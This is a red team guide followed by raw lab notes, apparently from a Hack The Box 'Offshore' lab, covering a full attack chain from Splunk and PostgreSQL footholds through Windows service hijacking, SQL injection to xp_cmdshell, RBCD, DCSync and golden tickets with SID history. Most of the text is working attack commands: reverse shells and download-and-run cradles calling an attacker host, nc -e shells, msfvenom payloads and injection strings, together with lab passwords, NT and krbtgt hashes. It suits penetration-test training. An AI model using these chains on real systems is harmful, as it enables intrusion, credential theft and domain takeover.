
Comprehensive Guide to Red Team Techniques: Server and Network Penetration
Introduction
Red teaming simulates a real-world cyberattack to test an organization's defenses. This guide focuses on practical, hands-on examples of common red team techniques, from gaining initial access to escalating privileges, pivoting across networks, and ultimately achieving the target objectives. The raw lab notes the examples were distilled from follow the guide.
Disclaimer: The following techniques should only be used in authorized penetration testing engagements with explicit permissions.
Initial Access
1. Abusing Splunk Custom Search Commands (Splunk Example)
- With admin credentials, log in to Splunk's web interface:
Code:http://10.10.110.123:8000
- Install a malicious Splunk app (a tar.gz containing a custom search command) via Apps > Manage Apps > Install app from file, then run the command from the search bar to get a reverse shell. This is the technique from https://www.n00py.io/2018/10/popping-shells-on-splunk/ ; it abuses legitimate functionality rather than a software bug, so a fully patched Splunk is still exposed once an admin account is compromised:
Code:| revshell std 10.10.14.3 443
- Upgrade to a better shell: generate a Python reverse shell with msfvenom, start a listener on port 4444 first, and paste the one-liner into the Splunk shell:
Code:msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=4444 R
Code:python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('<BASE64_PAYLOAD>')[0]))"
Post-Exploitation: Database Enumeration and Privilege Escalation
2. PostgreSQL Exploitation
- Forward the PostgreSQL port to Kali with a chisel reverse tunnel. Start the server on Kali first:
Code:./chisel server -p 9003 --reverse
- Then, on the compromised host (NIX01), connect back and expose its local PostgreSQL port on Kali's 127.0.0.1:5432:
Code:./chisel client 10.10.14.3:9003 R:5432:127.0.0.1:5432
- Execute a Command via PostgreSQL: with valid database credentials (password postgres, database template1 in the lab), use the Metasploit module that abuses COPY ... FROM PROGRAM to run OS commands as the postgres user. It needs PostgreSQL 9.3 or later and a superuser (or pg_execute_server_program) role; point RHOSTS at 127.0.0.1, since the port is tunneled:
Code:use multi/postgres/postgres_copy_from_program_cmd_exec
- Privilege Escalation: check the sudo rules (sudo -l). Here postgres may run tail as root, which is enough to read root's private SSH key; -n +1 makes tail print the whole file from the first line rather than only the last ten:
Code:sudo /usr/bin/tail -f -n +1 /root/.ssh/id_rsa
Lateral Movement
3. Sniffing Credentials on the Pivot Host
Traffic passing the compromised host NIX01 included cleartext HTTP logins for the web application on MS01 (172.16.1.30). Capture it with tcpdump (-nn skips name resolution, -s0 keeps whole packets, the filter keeps only port 80) and pull the credentials out of it:
Code:
tcpdump -i eth0 -nn -s0 -v port 80 -w test.pcap
- Copy the pcap to Kali and open it; following the HTTP stream shows the login request and, with it, the password:
Code:
wireshark test.pcap
4. Remote Desktop Protocol (RDP) Access
- Use proxychains (pointing at the SOCKS pivot) to connect via RDP with the harvested credentials:
Code:proxychains remmina
- Once local admin, add an administrative user for persistence (two separate commands):
Code:net user newadmin NewPassword123 /add
Code:net localgroup administrators newadmin /add
Escalating Privileges
5. Replacing a Writable Service Binary
- Look for a service that runs as LocalSystem but whose binary, or the directory it lives in, is writable by the current user: sc.exe qc shows the binary path and account, icacls the permissions. Generate a reverse shell executable for Windows and name it exactly as the service's binary:
Code:msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe > malicious.exe
- Place the payload in the service directory (replacing the original binary) and restart the service with two separate commands. Expect a "service did not respond" error, because a plain exe never talks to the Service Control Manager; the shell still fires, but the SCM may kill the process after its start timeout, so migrate promptly or build the payload with -f exe-service instead:
Code:sc.exe stop VulnerableService
Code:sc.exe start VulnerableService
Active Directory Attacks
6. Resource-Based Constrained Delegation (RBCD), Impersonation and DCSync
This chain needs an account that can write msDS-AllowedToActOnBehalfOfOtherIdentity on the target domain controller's computer object, and a domain where ms-DS-MachineAccountQuota is still at its default of 10, so that any authenticated user can add a machine account.
- Create a Fake Machine Account (Powermad):
Code:New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force)
- Generate a Security Descriptor with a single ACE that grants the fake machine's SID full control. The SID is the objectSid of FAKE01 (Get-DomainComputer FAKE01 | select objectsid), not the domain SID:
Code:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<FAKE01_SID>)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
- Apply the Security Descriptor to the Target DC (PowerView). Check that the attribute is empty first, since this overwrites it, and read it back afterwards to confirm the write:
Code:Set-DomainObject -Identity "DC01" -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
- Impersonate a privileged user to the DC: with the fake machine's key (the NT hash of its password, computed with Rubeus hash), request a service ticket for the DC via S4U2Self/S4U2Proxy and inject it (Rubeus s4u /impersonateuser; the full command is in the raw notes below). The ticket is only good for the SPN you asked for, so request cifs/ or ldap/ on the DC depending on what comes next.
- Perform DCSync with Mimikatz. This needs replication rights on the domain, which the impersonated administrator has; the notes instead grant them to a controlled user with PowerView's Add-ObjectACL -Rights DCSync:
Code:mimikatz # lsadump::dcsync /domain:<DOMAIN> /user:<USER>
Credential Harvesting
7. Extracting Hashes from Files
- Extract the password hash from an encrypted Office file with office2john and crack it with John (two separate commands; in the lab logins.xlsx opened with "broken"):
Code:python office2john.py encrypted.xlsx > hash.txt
Code:john --wordlist=rockyou.txt hash.txt
Cross-Domain Attacks
8. Using Kerberos TGTs for Cross-Domain Lateral Movement (Child to Parent)
- Forge a golden ticket with SID history (what the raw notes call an inter-realm TGT). A golden ticket alone only gives the child domain; the /sids option adds the forest root's Enterprise Admins SID (the root domain SID followed by RID 519) to the ticket's ExtraSids. SID filtering is not enforced on the parent-child trust inside a forest, so the parent's DCs accept the extra SID. Inputs: the child domain SID, the child krbtgt NT hash (from DCSync) and the root domain SID (Get-DomainSID -Domain <ROOT_DOMAIN>):
Code:mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:<CHILD_DOMAIN_SID> /sids:<ROOT_DOMAIN_SID>-519 /krbtgt:<KRBTGT_HASH> /ptt"
- Access a Target System in the parent domain. Use the hostname, not the IP: Kerberos tickets are issued for SPNs, and a UNC path by IP falls back to NTLM, where the injected ticket is never used:
Code:net use \\<TARGET_HOSTNAME>\C$
Defensive Measures
- Implement Network Segmentation: isolate critical assets (domain controllers, database servers, admin workstations) from general network traffic, and do not let a single compromised host like NIX01 reach every internal subnet.
- Monitor Network Traffic: use IDS/IPS to detect unusual patterns like port scanning or unauthorized lateral movement, and treat cleartext HTTP logins on internal networks as a finding in their own right; the capture above shows how cheaply they are harvested.
- Regularly Audit Privileges: ensure no excessive privileges are granted unnecessarily. For the attacks above specifically: set ms-DS-MachineAccountQuota to 0, alert on writes to msDS-AllowedToActOnBehalfOfOtherIdentity on computer objects, alert when replication (DCSync) rights are granted to anything that is not a domain controller, and treat the forest, not the domain, as the security boundary, since a child domain's krbtgt hash compromises the parent.
- Enforce Strong Authentication: use multi-factor authentication (MFA) for all administrative accounts, and keep sudo rules and service binary ACLs tight so that a foothold does not become root or SYSTEM.
- Educate Teams:Train employees to recognize suspicious activity and implement regular security drills.
Summary
This guide provides practical examples for red team activities, showcasing techniques for gaining access, escalating privileges, and pivoting across networks. By understanding these methods, security teams can better anticipate and defend against sophisticated adversaries.

Raw Lab Notes
10.10.110.123 NIX01
Initial Shell:
https://www.n00py.io/2018/10/popping-shells-on-splunk/
upload the malicious app tar.gz, get a shell
>10.10.110.123:8000
>| revshell std 10.10.14.3 443
get a nicer shell from that limited shell:
>msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=4444 R
paste the output into the limited shell (with a listener on 4444) to get a normal shell:
>python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('<BASE64_PAYLOAD>')[0]))"
>python -c 'import pty; pty.spawn("/bin/sh")'
we now have a shell as mark; from mark to postgres:
password: postgres
database: template1
table : test
forward the PostgreSQL port to Kali
on kali (server first):
./chisel server -p 9003 --reverse
on NIX01:
./chisel client 10.10.14.3:9003 R:5432:127.0.0.1:5432
get a shell as postgres with msf:
use multi/postgres/postgres_copy_from_program_cmd_exec
*set the above password, database and table in the module options, run it and get a shell
postgres to root
sudo /usr/bin/tail -f -n +1 /root/.ssh/id_rsa
root
172.16.1.30 MS01
run tcpdump on NIX01; creds and a flag can be grabbed from the cleartext HTTP traffic:
tcpdump -i eth0 -nn -s0 -v port 80 -w test.pcap
creds:
user: admin
pass: Zaq12wsx!
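Section 3 of the guide and the NIX01 tcpdump note above both rely on HTTP logins crossing the wire in cleartext. The following Python script is an added example (not from the original notes) of pulling those credentials out of a reassembled HTTP stream: it walks the requests one by one, decodes Authorization: Basic headers and reads login form fields from urlencoded POST bodies. The stream it parses is constructed for the example (the admin/Zaq12wsx! pair from the notes placed in made-up requests to 172.16.1.30); in real use you would feed it the raw bytes saved from Wireshark's Follow TCP Stream on a port-80 session of the capture.

```python
"""Extract credentials from cleartext HTTP requests (added example).

Input is a reassembled request stream, e.g. the raw bytes of Wireshark's
"Follow TCP Stream" on a port-80 session from the tcpdump capture.
"""
from __future__ import annotations

import base64
from urllib.parse import parse_qs

USER_FIELDS = {"user", "username", "login", "email", "uid"}
PASS_FIELDS = {"pass", "password", "passwd", "pwd"}


def _request(*header_lines: bytes, body: bytes = b"") -> bytes:
    return b"\r\n".join(header_lines) + b"\r\n\r\n" + body


# Constructed sample (not a real capture): a Basic-auth GET and a login
# form POST to the MS01 web app, using the admin / Zaq12wsx! pair from the notes.
SAMPLE_STREAM = _request(
    b"GET /admin/ HTTP/1.1", b"Host: 172.16.1.30",
    b"Authorization: Basic " + base64.b64encode(b"admin:Zaq12wsx!"),
) + _request(
    b"POST /login HTTP/1.1", b"Host: 172.16.1.30",
    b"Content-Type: application/x-www-form-urlencoded", b"Content-Length: 35",
    body=b"username=admin&password=Zaq12wsx%21",
)


def iter_requests(stream: bytes):
    """Yield (request line, lower-cased header dict, body) per request,
    using Content-Length to find where each body ends."""
    pos = 0
    while True:
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            return
        lines = stream[pos:head_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        try:
            length = int(headers.get("content-length", "0"))
        except ValueError:
            length = 0
        yield lines[0], headers, stream[body_start:body_start + length]
        pos = body_start + length


def extract_credentials(stream: bytes) -> list[dict]:
    """Return one dict per credential found (Basic auth or login form)."""
    found = []
    for request_line, headers, body in iter_requests(stream):
        auth = headers.get("authorization", "")
        if auth[:6].lower() == "basic ":
            try:
                decoded = base64.b64decode(auth[6:].strip(), validate=True).decode("latin-1")
            except ValueError:  # binascii.Error is a ValueError
                decoded = ""
            if ":" in decoded:
                user, _, password = decoded.partition(":")
                found.append({"source": "basic-auth", "request": request_line,
                              "user": user, "password": password})
        if headers.get("content-type", "").startswith("application/x-www-form-urlencoded") and body:
            fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
            user = next((v[0] for k, v in fields.items() if k.lower() in USER_FIELDS), None)
            password = next((v[0] for k, v in fields.items() if k.lower() in PASS_FIELDS), None)
            if user is not None and password is not None:
                found.append({"source": "form", "request": request_line,
                              "user": user, "password": password})
    return found


if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_STREAM):
        print(f"{cred['source']:10} {cred['request']:24} {cred['user']}:{cred['password']}")
```

The field-name sets are deliberately small; extend USER_FIELDS and PASS_FIELDS for the application you are looking at. Anything that shows up here is also visible to whoever controls any hop between client and server, which is the point the tcpdump step makes.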
create a Workflow > External Actions > Execute Windows Script
Set objShell = CreateObject("Wscript.Shell")
objShell.Run("powershell.exe -c IEX(New-object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1')")
run the Workflow and get shell
crack the logins.xlsx file from the Documents directory:
>python office2john.py .\logins.xlsx > hash.txt
>.\john.exe --wordlist=.\rockyou.txt hash.txt
Password=broken
172.16.1.36 WSADM
proxychains remmina
username: NED.FLANDERS_ADM
password: Lefthandedyeah!
domain : CORP.LOCAL
sc.exe qc "WCAssistantService"
generate exe: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f exe > Lavasoft.WCAssistant.WinService.exe
place it under: C:\Program Files (x86)\Lavasoft\Web Companion\Application
restart the service:
>sc.exe stop WCAssistantService
>sc.exe start WCAssistantService
add a new user to administrators:
net user olala olala12345 /add
net localgroup administrators olala /add
rdp as the local admin wsadmin:
proxychains remmina
username: wsadmin
password: Workstationadmin1!
domain : CORP.LOCAL
172.16.1.101 WS02
proxychains remmina
username: wsadmin
password: Workstationadmin1!
domain : CORP.LOCAL
flags
1: Memories, fond memories :::::: OFFSHORE{mimikatz_d03s_th3_j0b}
172.16.1.24 WEB-WIN01
login to http://172.16.1.24/login
creds: svc_iis:::Vintage!
app login (SQLi auth bypass):
login: admin'--
pass: admin
parse /DocumentsService.asmx?WSDL with the Wsdler Burp extension; the author field of the /getDocuments_Dev request is vulnerable to SQLi.
Shell by exploiting the SQL injection (confirm execution with an ICMP callback first):
>a'); exec xp_cmdshell "ping 10.10.12.8"--
>tcpdump -i tun0 icmp
>a'); exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.12.8/shell.ps1')"--
Getting to CYBER_ADM which is localadmin on this box:
PGIBBONS -> SALVADOR
Get Shell as PGIBBONS and change password for SALVADOR:
>runas /user:PGIBBONS@corp.local "powershell.exe"
>$cred = ConvertTo-SecureString "HTBIsCool!!" -AsPlainText -force
>Set-DomainUserPassword -identity SALVADOR -accountpassword $cred
SALVADOR -> SECURITY ENGINEERS
Get Shell as SALVADOR and add him to SECURITY ENGINEERS group:
>runas /user:SALVADOR@corp.local "powershell.exe"
>Add-DomainGroupMember -Identity 'SECURITY ENGINEERS' -Members 'SALVADOR'
>Get-DomainGroupMember -Identity 'SECURITY ENGINEERS'
SALVADOR -> CYBER_ADM
Change Password for CYBER_ADM from SALVADOR:
>$cred = ConvertTo-SecureString "HTBIsCool!!" -AsPlainText -force
>Set-DomainUserPassword -identity CYBER_ADM -accountpassword $cred
>proxychains remmina
username: CYBER_ADM
password: HTBIsCool!!
domain : CORP.LOCAL
172.16.1.5 OFFSHORE-CORP-DC01
DC01:
Target computer DC01
Admins on target computer corp.local
Fake computer name FAKE01
Fake computer SID To be retrieved during attack
Fake computer password 123456
Windows 2012 Domain Controller DC01
Check ms-DS-MachineAccountQuota on the domain object:
>Get-DomainObject -Identity "dc=corp,dc=local" -Domain corp.local
Get DomainController:
>Get-DomainController
Target computer DC01 object must not have the attribute msds-allowedtoactonbehalfofotheridentity set:
>Get-NetComputer DC01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Add fake machine:
>import-module powermad
>New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get SID of fake machine:
>Get-DomainComputer fake01 | select objectsid
Create a new raw security descriptor for the FAKE01 computer principal:
>$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2291914956-3290296217-2402366952-10101)"
>$SDBytes = New-Object byte[] ($SD.BinaryLength)
>$SD.GetBinaryForm($SDBytes, 0)
Applying the security descriptor bytes to the target DC01 machine:
>Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Check that the attribute was set:
>Get-DomainComputer DC01 -Properties 'msds-allowedtoactonbehalfofotheridentity'
Let's generate the RC4 hash of the password we set for the FAKE01 computer:
>.\Rubeus.exe hash /password:123456 /user:fake01 /domain:corp.local
Impersonation
>cd c:\users\public\documents
>.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:iamtheadministrator /msdsspn:cifs/DC01.corp.local /ptt
>.\Rubeus.exe s4u /user:fake01$ /domain:corp.local /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:iamtheadministrator /msdsspn:http/dc01 /altservice:cifs,host /ptt
>hostname; pushd "\\dc01\c$"
Login to WEB-WIN01 as CYBER_ADM, get an NT AUTHORITY\SYSTEM shell, load PowerView.ps1, give any user DCSync rights:
>Add-ObjectACL -PrincipalIdentity SALVADOR -Rights DCSync
get a shell as SALVADOR, load mimikatz.exe, DCSync, profit:
>log dcsync.log
>lsadump::dcsync /domain:corp.local /dc:172.16.1.5 /all /csv
get a shell as iamtheadministrator (NT hash from the DCSync output):
proxychains wmiexec.py CORP.LOCAL/iamtheadministrator@172.16.1.5 -hashes :70016778cb0524c799ac25b439bd67e0
172.16.1.15 SQL01.CORP.LOCAL
>proxychains wmiexec.py CORP.LOCAL/iamtheadministrator@<TARGET_IP> -hashes :70016778cb0524c799ac25b439bd67e0
>net user olala @#$% /add /domain
>net localgroup administrators olala /add /domain
>net group "Domain Admins" olala /Add /domain
>net group "Enterprise Admins" olala /Add /domain
rdp to any machine, open powershell:
>runas /user:olala@corp.local "powershell.exe" ::::: @#$%
>enter-pssession -computername SQL01.CORP.LOCAL
>get the flags
172.16.1.26 FS01.CORP.LOCAL
>proxychains wmiexec.py CORP.LOCAL/iamtheadministrator@<TARGET_IP> -hashes :70016778cb0524c799ac25b439bd67e0
>net user olala @#$% /add /domain
>net localgroup administrators olala /add
>net group "Domain Admins" olala /Add /domain
>net group "Enterprise Admins" olala /Add /domain
rdp to any machine, open powershell:
>runas /user:olala@corp.local "powershell.exe" ::::: @#$%
>enter-pssession -computername FS01.CORP.LOCAL
>get the flags
172.16.2.12 MGMT01.DEV.ADMIN.OFFSHORE.COM
first get a shell on DC01:
kali:
>./chisel server -p 9003 --reverse
target:
>.\chisel.exe client 10.10.12.8:9003 R:80:172.16.2.12:80
change the password of "glpi_adm" (lol.py is a helper script not included in the notes; first through the forwarded port, then through proxychains):
>python lol.py --url http://localhost/ --user normal --password normal --email <email> --newpass shell
>proxychains4 -f /root/main-network/proxychains.conf python lol.py --url http://172.16.2.12/ --user normal --password normal --email <email> --newpass shell
>proxychains4 -f /root/main-network/proxychains.conf python3 narmu0.py
newcreds:
>glpi_adm::shell
>http://localhost/front/backup.php?dump=dump&offsettable=312&fichier=C:\xampp\htdocs\pics\dump2.php
>http://localhost/pics/dump2.php?0=dir
>lolz.php?0=cmd.exe%20/c%20C:\\windows\\tasks\\nc.exe%2010.10.12.8%209091%20-e%20cmd.exe
get a SYSTEM shell with PrintSpoofer:
>.\pf.exe -c "C:\xampp\htdocs\sound\nc.exe 10.10.12.8 8081 -e cmd"
172.16.2.102 WS03.DEV.ADMIN.OFFSHORE.COM
Log in as a Domain Admin of CORP.LOCAL and change the password of SVC_DEVOPS, which is local admin on WS03:
>$cred = ConvertTo-SecureString "Password123" -AsPlainText -force
>Set-DomainUserPassword -identity svc_devops -accountpassword $cred
Get shell as SVC_DEVOPS:
>proxychains4 -f /root/main-network/proxychains.conf psexec.py 'svc_devops:Password123'@172.16.2.102 cmd.exe
WS03 From Joe to DC02:
Get DomainController:
>Get-DomainController
Target computer DC02 object must not have the attribute msds-allowedtoactonbehalfofotheridentity set:
>Get-NetComputer DC02 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Add fake machine:
>import-module powermad
>New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get SID of fake machine:
>Get-DomainComputer fake01 | select objectsid
Create a new raw security descriptor for the FAKE01 computer principal:
>$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1416445593-394318334-2645530166-7101)"
>$SDBytes = New-Object byte[] ($SD.BinaryLength)
>$SD.GetBinaryForm($SDBytes, 0)
Applying the security descriptor bytes to the target DC02 machine:
>Get-DomainComputer DC02 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Check that the attribute was set:
>Get-DomainComputer DC02 -Properties 'msds-allowedtoactonbehalfofotheridentity'
Let's generate the RC4 hash of the password we set for the FAKE01 computer:
>.\Rubeus.exe hash /password:123456 /user:fake01 /domain:DEV.ADMIN.OFFSHORE.COM
Impersonation
>cd c:\users\public\documents
>.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/DC02.DEV.ADMIN.OFFSHORE.COM /ptt
>.\Rubeus.exe s4u /user:fake01$ /domain:DEV.ADMIN.OFFSHORE.COM /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:http/dc02 /altservice:cifs,host /ptt
>dir \\dc02\c$
>hostname; pushd "\\dc02\c$"
DCSync (S4U for the LDAP SPN on DC02, then dump with mimikatz):
>.\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:LDAP/dc02.dev.admin.offshore.com /ptt
>.\mimikatz.exe
>privilege::debug
>lsadump::dcsync /domain:DEV.ADMIN.OFFSHORE.COM /dc:172.16.2.6 /all /csv
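Section 6 of the guide and the DC01/DC02 steps above both build the security descriptor with .NET's RawSecurityDescriptor and write its bytes into msDS-AllowedToActOnBehalfOfOtherIdentity. The Python below is an added example, not code from the original notes nor from PowerView or Powermad: it reimplements the encoding in pure Python so the structure of the blob is visible, and adds the decoder a defender needs to list which SIDs a computer object currently trusts to act on behalf of other identities. The SID is FAKE01's from the DC01 notes; the constants and layouts follow the Windows self-relative SECURITY_DESCRIPTOR, ACL and ACCESS_ALLOWED_ACE formats as documented in MS-DTYP. Byte-for-byte equality with GetBinaryForm output is not claimed (.NET may set additional control bits), only equivalent meaning.

```python
"""Encode and decode msDS-AllowedToActOnBehalfOfOtherIdentity (added example).

Pure-Python equivalent of the page's RawSecurityDescriptor/GetBinaryForm
step, plus the decoder a defender needs. Layouts follow MS-DTYP:
self-relative SECURITY_DESCRIPTOR, ACL and ACCESS_ALLOWED_ACE.
"""
from __future__ import annotations

import struct

# SDDL "CCDCLCSWRPWPDTLOCRSDRCWDWO": CC DC LC SW RP WP DT LO CR (0x1FF)
# plus SD RC WD WO (0xF0000): full control over the object.
FULL_CONTROL = 0x000F01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 2
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
SD_HEADER = "<BBHIIII"    # revision, sbz1, control, owner/group/sacl/dacl offsets
ACL_HEADER = "<BBHHH"     # revision, sbz1, size, ace count, sbz2
BUILTIN_ADMINS = "S-1-5-32-544"  # "O:BA" in the page's SDDL
FAKE01_SID = "S-1-5-21-2291914956-3290296217-2402366952-10101"  # from the notes


def sid_to_bytes(sid: str) -> bytes:
    """Text SID -> binary SID (revision, subauth count, 48-bit authority, subauths)."""
    parts = sid.split("-")
    if parts[0].upper() != "S" or len(parts) < 3:
        raise ValueError(f"not a SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(blob: bytes, offset: int = 0) -> tuple[str, int]:
    """Binary SID at offset -> (text SID, bytes consumed)."""
    revision, count = struct.unpack_from("<BB", blob, offset)
    authority = int.from_bytes(blob[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, offset + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids: list[str], mask: int = FULL_CONTROL) -> bytes:
    """Self-relative SD: owner BUILTIN\\Administrators, DACL with one
    ACCESS_ALLOWED ACE per SID. This is what gets written to the attribute."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header (type, flags, size) + access mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b
    acl = struct.pack(ACL_HEADER, ACL_REVISION, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    owner_off = struct.calcsize(SD_HEADER)   # owner SID directly after the header
    dacl_off = owner_off + len(owner)        # DACL after the owner; no group, no SACL
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner + acl


def parse_rbcd_sd(blob: bytes) -> list[tuple[str, int]]:
    """(SID, access mask) for every ACCESS_ALLOWED ACE in the DACL: the
    principals allowed to act on behalf of other identities to this computer."""
    if len(blob) < struct.calcsize(SD_HEADER):
        return []
    revision, _, control, _, _, _, dacl_off = struct.unpack_from(SD_HEADER, blob, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, dacl_off)
    pos = dacl_off + struct.calcsize(ACL_HEADER)
    allowed = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", blob, pos + 4)
            allowed.append((bytes_to_sid(blob, pos + 8)[0], mask))
        pos += ace_size  # object ACEs and deny ACEs are skipped by size
    return allowed


if __name__ == "__main__":
    sd = build_rbcd_sd([FAKE01_SID])
    print(sd.hex())
    for sid, mask in parse_rbcd_sd(sd):
        print(f"{sid} mask=0x{mask:X}")
```

On the defensive side, pull the attribute from the DC's computer object (Get-DomainComputer DC01 -Properties msds-allowedtoactonbehalfofotheridentity, or a plain LDAP search), hand the raw bytes to parse_rbcd_sd and resolve the SIDs: a machine account that was created minutes earlier and is listed against a domain controller is exactly the state these notes create.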
svc_devops on ws03
ConvertFrom-SID S-1-5-21-2291914956-3290296217-2402366952-3609 :::: CORP\svc_devops
$cred = ConvertTo-SecureString "Password123" -AsPlainText -force
Set-DomainUserPassword -identity svc_devops -accountpassword $cred
Shell on dc02 (172.16.2.6):
>proxychains4 -f /root/main-network/proxychains.conf wmiexec.py DEV.ADMIN.OFFSHORE.COM/administrator@172.16.2.6 -hashes :c61f43b6a4db2676714713836b7d2ea6
DC02:
>net user magic 1ts-mag1c!!! /add /domain
>net localgroup administrators magic /add
>net group "Domain Admins" magic /Add /domain
proxychains4 -f /root/main-network/proxychains.conf psexec.py 'magic:1ts-mag1c!!!'@172.16.2.6 cmd.exe
proxychains4 -f /root/main-network/proxychains.conf evil-winrm -i 172.16.2.6 -u magic -P 5985 -p '1ts-mag1c!!!'
DC02 To DC03:
Go to DC01, get a shell as magic, load PowerView.ps1:
>$SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
>$Cred = New-Object System.Management.Automation.PSCredential('DEV.ADMIN.OFFSHORE.COM\magic', $SecPassword)
>Enter-PsSession -ComputerName DC02.DEV.ADMIN.OFFSHORE.COM -Credential $Cred
Get-DomainSID -Domain dev.ADMIN.OFFSHORE.COM
S-1-5-21-77175520-687805270-358672322
Get-DomainSID -Domain ADMIN.OFFSHORE.COM
S-1-5-21-1216317506-3509444512-4230741538
#Create the Enterprise Admins SID
Format: RootDomainSID-519
: S-1-5-21-1216317506-3509444512-4230741538-519
#krbtgt Hash
9404def404bc198fd9830a3483869e78
# Mimikatz Magic, Creating an Inter-Realm TGT
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:dev.ADMIN.OFFSHORE.COM /sid:S-1-5-21-77175520-687805270-358672322 /sids:S-1-5-21-1216317506-3509444512-4230741538-519 /krbtgt:9404def404bc198fd9830a3483869e78 /ptt"
mimikatz # lsadump::dcsync /domain:ADMIN.OFFSHORE.COM /all /csv
DC02.DEV.ADMIN.OFFSHORE.COM --> DC03.ADMIN.OFFSHORE.COM
Use chisel for pivoting and then:
proxychains4 -f /root/main-network/proxychains.conf wmiexec.py ADMIN.OFFSHORE.COM/<USER>@<DC03_IP> -hashes :f2594c9e60abf7e28e7601db343a7e24
>net user magic 1ts-mag1c!!! /add /domain
>net localgroup administrators magic /add
>net group "Domain Admins" magic /Add /domain
>net group "Enterprise Admins" magic /Add /domain
>net group "Schema Admins" magic /Add /domain
>net group "Group Policy Creator Owners" magic /Add /domain
proxychains4 -f /root/main-network/proxychains.conf remmina
Flags:
1: Again, and again, and again :::: OFFSHORE{w@tch_th0s3_3xtra_$ids}
DC03.ADMIN.OFFSHORE.COM --> WS04.ADMIN.OFFSHORE.COM:
user magic or DA can rdp to WS04
Flags:
1: Deforestation is such a shame :::: OFFSHORE{w@tch_th3_for3st_burn}
MS02 to DC4:
get rdp on MS02 as CLEARNER:
>.\Rubeus.exe s4u /user:ms02$ /rc4:dc7a49c0c36399ae87f3de623ebab985 /impersonateuser:administrator /msdsspn:"cifs/DC04.CLIENT.OFFSHORE.COM" /altservice:cifs,host /ptt
>dir \\DC04.CLIENT.OFFSHORE.COM\C$
>net user magic 1ts-mag1c!!! /add /domain
>net group "Domain Admins" magic /Add /domain
>$SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
>$Cred = New-Object System.Management.Automation.PSCredential('CLIENT.OFFSHORE.COM\magic', $SecPassword)
>Enter-PsSession -ComputerName DC04.CLIENT.OFFSHORE.COM -Credential $Cred
>.\mimikatz.exe "lsadump::dcsync /domain:CLIENT.OFFSHORE.COM /all /csv" "exit"
Flags:
1: One massive screwup ::::: OFFSHORE{c@r3ful_who_y0u_d3legate_t0}
2: I feel so exposed ::::: OFFSHORE{d0nt_overl00k_gp0}
NIX03 172.16.4.120
